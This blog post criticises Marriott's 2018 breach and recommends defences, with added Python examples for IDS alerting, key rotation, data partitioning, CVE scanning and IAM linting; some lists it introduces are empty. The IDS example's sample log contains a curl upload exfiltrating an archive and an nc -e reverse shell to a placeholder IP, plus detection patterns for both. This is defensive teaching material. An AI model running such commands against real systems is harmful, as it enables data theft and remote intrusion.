Dan Munro - Dev-Sec-Ops Engineer

The Colossal, Monumental Screw Up That Is Marriott Security

The Damage

From Decipher reporting:

For [173 million] affected customers, the attackers only had access to names and some address and email address data.


For 327 million people, information compromised in the breach includes names, home addresses, phone numbers, email addresses, some passport numbers, dates of birth, and some payment card information.

…What does one even say to this?

Why did they have all this data in the first place?

Did Marriott not even have security engineers on staff?

Let’s examine at a high level a handful of defense and mitigation strategies that could have greatly improved Marriott’s response to this incident.

It’s important that these recommendations be implemented correctly. For example, an IDS that generates thousands of alerts nobody triages does not contribute any value; that is the definition of security theater.

Intrusion Detection Systems

Any IDS worth its salt would most likely have significantly reduced the blast radius of this attack. It’s hard to say for certain when speaking in hypotheticals, but detecting intrusions is literally their job.

Host-based IDSs run as agents directly on host systems; network-based IDSs watch traffic at network chokepoints. Either way, they collate connections along with contextual information, such as source and destination IPs, commands executed, and possible data exfiltration attempts. Alerts can trigger on suspicious activity either via explicitly configured rules or via anomaly detection (machine learning, in some products). Suspicious activity includes, but is not limited to:

If an IDS is in place but generates more alerts than anyone can triage, that’s worse than no IDS at all: the one alert that matters drowns in the noise, and the team learns to ignore the feed.
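To make the two points above concrete (rule-based alerting on host activity, and why raw alert volume is the wrong goal), here is an added example that is not part of the original post and not taken from any real IDS product. It runs a small rule set over constructed, hypothetical host execution log lines, collapses repeated hits from the same host/user/rule into a single alert with a count, and correlates a database dump followed by an outbound upload by the same actor into one higher-severity "exfiltration chain" alert. The log format, rule names, severities, hostnames and IPs (RFC 5737 documentation range) are all assumptions made for this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed host execution log, hypothetical format: "<ts> host=<h> user=<u> cmd=<command>".
# Not real Marriott data. The first three lines are a legitimate nightly backup job;
# the root and www lines are the kind of activity an IDS exists to catch.
SAMPLE_LOG = """\
2018-11-20T01:00:00Z host=db-01 user=backup cmd=/usr/bin/mysqldump --single-transaction crm
2018-11-20T01:00:05Z host=db-01 user=backup cmd=/usr/bin/mysqldump --single-transaction billing
2018-11-20T01:00:09Z host=db-01 user=backup cmd=/usr/bin/mysqldump --single-transaction loyalty
2018-11-20T02:14:07Z host=db-01 user=svc-app cmd=/usr/bin/psql -c "select 1"
2018-11-20T02:15:30Z host=db-01 user=root cmd=/usr/bin/mysqldump --all-databases
2018-11-20T02:16:02Z host=db-01 user=root cmd=/bin/tar czf /tmp/x.tgz /var/backups
2018-11-20T02:17:45Z host=db-01 user=root cmd=/usr/bin/curl -T /tmp/x.tgz http://203.0.113.9/up
2018-11-20T02:18:00Z host=web-03 user=www cmd=/usr/bin/nc -e /bin/sh 203.0.113.9 4444
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# Rule set over the executed command. Names and severities are this example's own.
RULES = {
    "db-dump": (re.compile(r"\b(mysqldump|pg_dump)\b"), "medium"),
    "archive-create": (re.compile(r"\btar\b.*\bc[a-z]*f\b"), "low"),
    "outbound-upload": (re.compile(r"\b(curl|wget)\b.*(?:-T\b|--upload-file|--data-binary)"), "high"),
    "reverse-shell": (re.compile(r"\bnc\b.*\s-e\s"), "critical"),
}


def parse(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(log_text, window=timedelta(minutes=10)):
    """Return (alerts, counts). Repeated hits for the same (host, user, rule) become
    one alert plus a count, so a noisy cron job cannot bury a real intrusion."""
    alerts = []
    counts = Counter()
    recent = defaultdict(list)  # (host, user) -> [(ts, rule), ...] for correlation
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        actor = (ev["host"], ev["user"])
        for rule, (rx, severity) in RULES.items():
            if not rx.search(ev["cmd"]):
                continue
            counts[actor + (rule,)] += 1
            recent[actor].append((ev["ts"], rule))
            if counts[actor + (rule,)] == 1:  # first occurrence only; later ones just bump the count
                alerts.append({"rule": rule, "severity": severity, "host": ev["host"],
                               "user": ev["user"], "first_seen": ev["ts"], "cmd": ev["cmd"]})
            # Correlation: a dump followed by an outbound upload by the same actor
            # inside the window is an exfiltration pattern and earns its own alert.
            if rule == "outbound-upload":
                earlier = {r for t, r in recent[actor] if ev["ts"] - t <= window}
                if "db-dump" in earlier:
                    alerts.append({"rule": "exfiltration-chain", "severity": "critical",
                                   "host": ev["host"], "user": ev["user"],
                                   "first_seen": ev["ts"], "cmd": ev["cmd"]})
    return alerts, counts


if __name__ == "__main__":
    found, hits = detect(SAMPLE_LOG)
    for a in found:
        n = hits.get((a["host"], a["user"], a["rule"]), 1)
        print(f'{a["severity"]:8} {a["rule"]:18} {a["host"]:7} {a["user"]:8} x{n}')
```

On the sample above this yields six alerts rather than eight raw rule hits: the three backup dumps collapse into one medium alert with a count of 3, while the root dump, archive and upload are kept separate and additionally raised as a critical exfiltration chain. Whether the backup job should be whitelisted entirely is a tuning decision; the mechanism is what matters.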

Regular Key And Certificate Rotation

A huge part of successful information security programs is change management. Keys and certs must be rotated on a regular schedule. An audit log must record which secrets were changed, when, and by whom. A separate record must be kept of who has access to each secret.

Manual rotation is a PITA, so automate it. Use HashiCorp Vault or another secret manager, and set up automatic key rotation. Rotation only works without outages if consumers can pick up the new secret gracefully, so plan for a short overlap window during which both the old and the new secret are accepted, and nothing longer.
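The mechanics that a secret manager automates are easy to get wrong when rolled by hand, so here is an added example (not from the original post, and not Vault's own code) showing a versioned HMAC signing keyring: rotation creates a new key id, the previous key is honoured only for a grace window, every rotation and access grant lands in an append-only audit log, and only principals on the access list may sign. The `Clock` class, the `k1`/`k2` key ids, the principal names and the token format `<kid>:<hex mac>` are all assumptions made for this example.

```python
import hashlib
import hmac
import secrets
from datetime import datetime, timedelta


class Clock:
    """Adjustable clock so the grace window can be exercised without sleeping (example-only)."""

    def __init__(self, start):
        self.now = start

    def advance(self, delta):
        self.now += delta


class RotatingKeyring:
    """Versioned HMAC keys with a grace window for the previous key and an audit log.
    Tokens are "<kid>:<hex mac>" so a verifier knows which key version to use."""

    def __init__(self, clock, grace=timedelta(hours=1)):
        self.clock = clock
        self.grace = grace
        self.keys = {}          # kid -> {"secret": bytes, "retired_at": datetime | None}
        self.active = None
        self.allowed = set()    # principals permitted to sign with the active key
        self.audit = []         # who changed what, and when
        self.rotate(actor="bootstrap")

    def _log(self, actor, event, **detail):
        self.audit.append({"at": self.clock.now, "actor": actor, "event": event, **detail})

    def rotate(self, actor):
        """Retire the active key (it stays valid for `grace`) and activate a fresh one."""
        old = self.active
        if old is not None:
            self.keys[old]["retired_at"] = self.clock.now
        kid = f"k{len(self.keys) + 1}"
        self.keys[kid] = {"secret": secrets.token_bytes(32), "retired_at": None}
        self.active = kid
        self._log(actor, "rotate", old=old, new=kid)

    def grant(self, actor, principal):
        self.allowed.add(principal)
        self._log(actor, "grant", principal=principal)

    def sign(self, principal, msg: bytes) -> str:
        if principal not in self.allowed:
            self._log(principal, "denied")
            raise PermissionError(f"{principal} may not sign")
        mac = hmac.new(self.keys[self.active]["secret"], msg, hashlib.sha256).hexdigest()
        return f"{self.active}:{mac}"

    def verify(self, msg: bytes, token: str) -> bool:
        kid, _, mac = token.partition(":")
        entry = self.keys.get(kid)
        if entry is None:
            return False
        retired = entry["retired_at"]
        if retired is not None and self.clock.now - retired > self.grace:
            return False  # previous key has aged out of the grace window
        expected = hmac.new(entry["secret"], msg, hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected.encode(), mac.encode())


def walkthrough():
    """Sign under k1, rotate to k2, and show k1 tokens surviving only the grace window."""
    clock = Clock(datetime(2018, 11, 30, 0, 0, 0))
    ring = RotatingKeyring(clock, grace=timedelta(hours=1))
    ring.grant("ops", "svc-billing")
    old_token = ring.sign("svc-billing", b"invoice-42")
    ring.rotate(actor="cron-rotate")                       # simulated scheduled rotation
    clock.advance(timedelta(minutes=30))
    in_grace = ring.verify(b"invoice-42", old_token)       # k1 retired 30 min ago: accepted
    new_token = ring.sign("svc-billing", b"invoice-42")    # signed with k2
    clock.advance(timedelta(minutes=45))
    after_grace = ring.verify(b"invoice-42", old_token)    # k1 retired 75 min ago: rejected
    still_valid = ring.verify(b"invoice-42", new_token)
    tampered = ring.verify(b"invoice-43", new_token)
    try:
        ring.sign("svc-unknown", b"invoice-42")
        denied = False
    except PermissionError:
        denied = True
    return {"in_grace": in_grace, "after_grace": after_grace, "still_valid": still_valid,
            "tampered": tampered, "denied": denied,
            "audit_events": [e["event"] for e in ring.audit]}


if __name__ == "__main__":
    print(walkthrough())
```

The grace window is the part people skip: rotate with zero overlap and every in-flight token or connection fails at the instant of rotation, so operators "fix" it by rotating less often, which is how secrets end up living for years.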

Penetration Testing

Attack yourself, before the bad guys do. Because they will attack, if they haven’t yet. Use open source tools, such as OWASP ZAP, to proactively discover exploitable flaws in the web applications and services you have left exposed on wide open ports.

BackBox Linux is an excellent pentesting Linux distro. It comes loaded with ZAP and a host of other tools that will help in analyzing an infrastructure for security vulnerabilities.

Principle Of Least Data

Don’t store payment information. Use a payment processor and integrate with their API, so card numbers never land in your databases; keep only the processor’s opaque token and whatever the UI genuinely needs (such as the last four digits).

Why, why, were passport numbers stored on-site?

Isolate and segregate databases behind private networks. For example, put PII in a database within its own private network, reachable only by the services that genuinely need it. Configure each database with strong, unique credentials, and rotate those credentials regularly (again, automation is essential here).

Here are pieces of data which may not need to be stored on site, or at least all in the same database, accessed by the same credentials:

If any of the above data is required, it should be partitioned into an isolated store with its own network, credentials and audit trail, or stored off site with third-party integrators.
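As an added example of the partitioning argued for in this section (not code from the original post or from any real processor), the snippet below splits one constructed reservation record across three places: card data goes to a stand-in payment processor that hands back an opaque token, passport and date of birth go to a PII store with its own credential, and the everyday profile store keeps only what the booking flow needs. A breach of the profile store's credential then yields names and emails but no passport numbers or card numbers. The `Store` and `PaymentProcessor` classes, the credentials and the `tok_`/`g_` identifier formats are assumptions made for this example; the sample card number is the standard 4111... test number.

```python
import hmac
import json
import secrets


class Store:
    """Stand-in for one database behind its own private network and credential."""

    def __init__(self, name):
        self.name = name
        self.credential = secrets.token_hex(16)  # unique per store; rotated by automation
        self.rows = {}

    def _check(self, credential):
        if not hmac.compare_digest(credential, self.credential):
            raise PermissionError(f"bad credential for {self.name}")

    def put(self, credential, key, row):
        self._check(credential)
        self.rows[key] = row

    def get(self, credential, key):
        self._check(credential)
        return self.rows[key]


class PaymentProcessor:
    """Stand-in for a third-party processor's tokenization API (hypothetical)."""

    def __init__(self):
        self._cards = {}  # the PAN lives here, off our systems

    def tokenize(self, pan, exp):
        token = "tok_" + secrets.token_hex(8)
        self._cards[token] = (pan, exp)
        return token, pan[-4:]


PROFILE_DB = Store("profile")    # name, email, card token: the app's working set
PII_VAULT = Store("pii-vault")   # passport, DOB: isolated, separate credential
PROCESSOR = PaymentProcessor()

SAMPLE_RESERVATION = {  # constructed test record
    "name": "A. Guest", "email": "guest@example.com",
    "passport": "X1234567", "dob": "1980-01-01",
    "card_pan": "4111111111111111", "card_exp": "12/21",
}


def onboard_guest(res):
    """Split a raw reservation by sensitivity; the profile DB never sees PAN or passport."""
    guest_id = "g_" + secrets.token_hex(4)
    # 1. Card data goes to the processor; we keep only the token and last four digits.
    token, last4 = PROCESSOR.tokenize(res["card_pan"], res["card_exp"])
    # 2. Passport and DOB go to the isolated PII store under its own credential.
    PII_VAULT.put(PII_VAULT.credential, guest_id, {"passport": res["passport"], "dob": res["dob"]})
    # 3. The working profile holds only what the booking flow needs day to day.
    PROFILE_DB.put(PROFILE_DB.credential, guest_id, {
        "name": res["name"], "email": res["email"],
        "card_token": token, "card_last4": last4})
    return guest_id


def dump_store(store):
    """Everything an attacker holding this one store's credential walks away with."""
    return json.dumps(store.rows, sort_keys=True)


def leaked(dump, secrets_to_check):
    """Which of the given sensitive values appear verbatim in a dump."""
    return [s for s in secrets_to_check if s in dump]


if __name__ == "__main__":
    gid = onboard_guest(SAMPLE_RESERVATION)
    print("profile dump:", dump_store(PROFILE_DB))
    print("leaked:", leaked(dump_store(PROFILE_DB), ["4111111111111111", "X1234567"]))
```

The same pattern applies to the 327 million records in the quote above: the loyalty profile is what gets queried a thousand times a second and is therefore the most exposed; it should be the least valuable thing to steal.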

Proactive CVE Handling

Scan build artifacts, application dependencies, and OS packages for known CVEs, both on every build and on a schedule, since new CVEs are published against versions you already run. Track progress on remediation.

Use KPIs like:
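As an added example (not from the original post, and not the output of any real scanner or feed), the snippet below scans a constructed requirements-style manifest against a constructed advisory list and then derives two remediation KPIs from the findings: open findings by severity, and findings past an assumed per-severity SLA. Package names, advisory ids, versions, dates and SLA days are all placeholders invented for this example.

```python
import re
from collections import Counter
from datetime import date

MANIFEST = """\
# constructed requirements.txt; package names are fictional
fooparser==1.4.2
barcrypto==0.9.0
bazweb==2.1.0
"""

# Constructed advisory feed: a package is affected if installed < fixed_in.
ADVISORIES = [
    {"id": "ADV-0001", "package": "fooparser", "fixed_in": "1.5.0",
     "severity": "critical", "published": date(2018, 10, 1)},
    {"id": "ADV-0002", "package": "barcrypto", "fixed_in": "0.9.0",
     "severity": "high", "published": date(2018, 9, 1)},      # already at the fixed version
    {"id": "ADV-0003", "package": "bazweb", "fixed_in": "2.1.3",
     "severity": "medium", "published": date(2018, 11, 20)},
]

SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}  # assumed policy
REPORT_DATE = date(2018, 11, 30)


def parse_version(v):
    """'1.4.2' -> (1, 4, 2); good enough for dotted numeric versions."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def parse_manifest(text):
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, ver = line.partition("==")
        deps[name.strip().lower()] = ver.strip()
    return deps


def scan(manifest, advisories):
    """Return advisories whose affected package is installed below the fixed version."""
    deps = parse_manifest(manifest)
    findings = []
    for adv in advisories:
        installed = deps.get(adv["package"])
        if installed and parse_version(installed) < parse_version(adv["fixed_in"]):
            findings.append({**adv, "installed": installed})
    return findings


def kpis(findings, today):
    """Open findings by severity, mean age in days, and ids past their SLA."""
    ages = {f["id"]: (today - f["published"]).days for f in findings}
    return {
        "open_by_severity": dict(Counter(f["severity"] for f in findings)),
        "mean_age_days": (sum(ages.values()) / len(ages)) if ages else 0.0,
        "overdue": [f["id"] for f in findings if ages[f["id"]] > SLA_DAYS[f["severity"]]],
    }


if __name__ == "__main__":
    found = scan(MANIFEST, ADVISORIES)
    for f in found:
        print(f'{f["id"]} {f["severity"]:8} {f["package"]} {f["installed"]} -> {f["fixed_in"]}')
    print(kpis(found, REPORT_DATE))
```

Age here is measured from the advisory's publication date rather than from when your scanner first saw it; the latter is the more flattering number and the one vendors tend to report, but the former is the one the attacker is working from.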

Zero Trust Networks

M&M security (a hardened perimeter with a soft, tasty interior) is not enough anymore. Treat every connection as potentially hostile, including internal traffic. Encrypt and authenticate traffic end to end (for example, mutual TLS between services). Segregate and partition resources and authorizations.

Minimize permissions on credentials to the bare minimum for a single-purpose use case, then name those credentials after that single purpose. For example, in AWS, define specific IAM roles (not IAM users with long-lived access keys), such as: ses-mailer, s3-uploader-svc-x, s3-viewer-svc-y. The name then documents the intent, and a role that suddenly needs a second, unrelated permission is a design smell worth a review.
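Least privilege is easy to state and easy to erode, so it is worth checking mechanically. As an added example (not from the original post), here is a small linter for AWS IAM policy documents that flags wildcard actions, wildcard resources, `NotAction` grants, and a role that touches more than one service, alongside a naming check modelled on the `s3-uploader-svc-x` convention above. The two policies are constructed for the example; the bucket name and role names are placeholders, and the naming regex is this example's assumption, not an AWS rule.

```python
import json
import re

# Constructed "before" policy: the kind that gets pasted in to make an error go away.
BROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
    ],
})

# Constructed "after" policy for a role whose one job is uploading to one bucket.
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:PutObject"],
         "Resource": "arn:aws:s3:::svc-x-uploads/*"},
    ],
})

# Assumed convention: lowercase, hyphen separated, e.g. "s3-uploader-svc-x".
ROLE_NAME_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)+$")


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def lint_policy(role_name, policy_json):
    """Return a list of least-privilege findings; an empty list means the policy passes."""
    findings = []
    if not ROLE_NAME_RE.match(role_name):
        findings.append(f"role name {role_name!r} should be lowercase-hyphenated and describe one purpose")
    doc = json.loads(policy_json)
    services = set()
    for i, st in enumerate(_as_list(doc.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue  # Deny statements only narrow access; not a least-privilege problem
        if "NotAction" in st:
            findings.append(f"statement {i}: NotAction grants everything except a list; enumerate actions instead")
        for action in _as_list(st.get("Action")):
            if action == "*" or action.endswith(":*"):
                findings.append(f"statement {i}: wildcard action {action!r}")
            if ":" in action:
                services.add(action.split(":", 1)[0])
        for resource in _as_list(st.get("Resource")):
            if resource == "*":
                findings.append(f"statement {i}: resource '*'; scope to the ARNs this role actually touches")
    if len(services) > 1:
        findings.append(f"role spans services {sorted(services)}; split into one role per purpose")
    return findings


if __name__ == "__main__":
    for name, policy in [("s3-uploader-svc-x", BROAD_POLICY), ("s3-uploader-svc-x", SCOPED_POLICY),
                         ("AdminRole", SCOPED_POLICY)]:
        print(name, lint_policy(name, policy) or "ok")
```

Run this in CI against the IAM policies in your infrastructure-as-code and fail the build on any finding; the point is not that the regexes are clever but that a `Resource: "*"` can no longer slip in unnoticed.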

Rant Summary

On the one hand, the level of negligence involved in allowing this to happen is utterly, mind-numbingly, staggeringly massive. There are processes, policies, and an endless list of proprietary and open source tools for monitoring, detecting, alerting on, and responding to security events.

On the other hand, is anyone surprised? At all? It was only a year ago that Equifax failed to protect the personal information of over 147 million Americans. Yahoo’s hack, with all three billion accounts compromised, was disclosed just a year before that (the actual hack happened around 2013).

To summarize some of the strategies outlined above:

What will it take for information security to be taken seriously? Perhaps GDPR-like legislation is the future.

Written on Nov 30, 2018.